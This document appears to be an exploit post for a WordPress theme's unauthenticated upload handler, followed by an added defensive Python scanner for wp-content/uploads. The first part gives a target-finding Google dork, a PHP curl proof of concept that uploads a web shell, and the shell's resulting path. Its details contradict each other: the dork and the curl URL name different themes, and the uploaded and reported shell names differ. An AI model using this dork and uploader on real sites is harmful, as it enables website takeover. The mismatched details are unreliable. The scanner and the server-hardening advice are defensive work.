Assalamuallaikum Wr.Wb
- #SidoarjoGetar | Stay calm and Hide our Skills
- #Author: aAn | Posted by PriaPolos Extreme Crew
- #Dork: inurl:"/themes/madidus-themes/"
- #Type: CSRF & Xampp, Uploadify
- #Tested:-
- #CMS:WordPress
Vulnerable file / exploit path: /wp-content/themes/madidus-themes/functions/upload-handler.php
CSRF PoC:
<?php
// Local file that gets posted to the unauthenticated upload handler
$uploadfile = "Ical.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
// Multipart file field; the handler reads it from the 'orange_themes' form name
curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// Handler response (contains the stored file location)
print "$postResult";
?>
Shell Location : /wp-content/uploads/[Year]/[Month]/IcalSadega.php
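The handler above stores whatever it receives under wp-content/uploads/[Year]/[Month]/, a tree that should only ever hold media. The following scanner is an added defender-side example, not code from the original post or from the theme: it walks an uploads directory and reports any file whose name carries a server-executable extension anywhere in its extension chain (Ical.php, logo.png.php, x.phtml) or a server-config dotfile such as .htaccess. The extension set, the sample directory layout and the file contents are constructed for the example.

```python
"""Scan a WordPress uploads directory for server-side executable files.

Added example (not from the original post). The upload handler described
above drops an attacker-controlled .php file under
wp-content/uploads/<year>/<month>/; this walks that tree and flags anything
that a web server could execute or that changes how the directory is served.
"""
import os
import tempfile

# Extensions that common PHP/Apache setups execute, or that are used to smuggle
# PHP past naive checks. This set is an assumption; extend it for your stack.
EXECUTABLE_EXTS = {
    "php", "php3", "php4", "php5", "php7", "php8",
    "phtml", "phar", "phps", "pht", "inc",
}
# Dotfiles / config files that change how the server treats the directory.
SUSPICIOUS_NAMES = {".htaccess", ".user.ini", "web.config"}


def is_suspicious(filename: str) -> bool:
    """True if the basename looks executable or is a server config file."""
    name = os.path.basename(filename)
    if name.lower() in SUSPICIOUS_NAMES:
        return True
    # "shell.php.jpg" splits into ["shell", "php", "jpg"]; any executable
    # part in the chain flags the file, not just the last extension.
    parts = name.lower().split(".")[1:]
    return any(p in EXECUTABLE_EXTS for p in parts)


def scan_uploads(uploads_dir: str) -> list:
    """Return sorted relative paths of suspicious files under uploads_dir."""
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for f in files:
            if is_suspicious(f):
                rel = os.path.relpath(os.path.join(root, f), uploads_dir)
                findings.append(rel)
    return sorted(findings)


def build_sample_tree() -> str:
    """Constructed sample wp-content/uploads layout for a stand-alone run.

    File contents are inert placeholders, not real uploads.
    """
    base = tempfile.mkdtemp(prefix="wp_uploads_")
    layout = {
        "2014/03/photo.jpg": b"\xff\xd8\xff",
        "2014/03/Ical.php": b"<?php /* constructed sample, inert */ ?>",
        "2014/04/logo.png.php": b"<?php /* double extension */ ?>",
        "2014/04/.htaccess": b"AddType application/x-httpd-php .jpg\n",
        "2014/05/report.pdf": b"%PDF-1.4",
    }
    for rel, content in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return base


if __name__ == "__main__":
    sample = build_sample_tree()
    for hit in scan_uploads(sample):
        print("SUSPICIOUS:", hit)
```

Run it against the real path (`scan_uploads("/var/www/html/wp-content/uploads")`) from a cron job or a post-incident triage script; a hit in a media directory is a strong indicator that an upload handler like the one above has been abused. The same check belongs at the web-server layer too: a rule that refuses to execute PHP under wp-content/uploads stops the dropped file from running even if detection lags.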
Credits : PriaPolos | Extreme Crew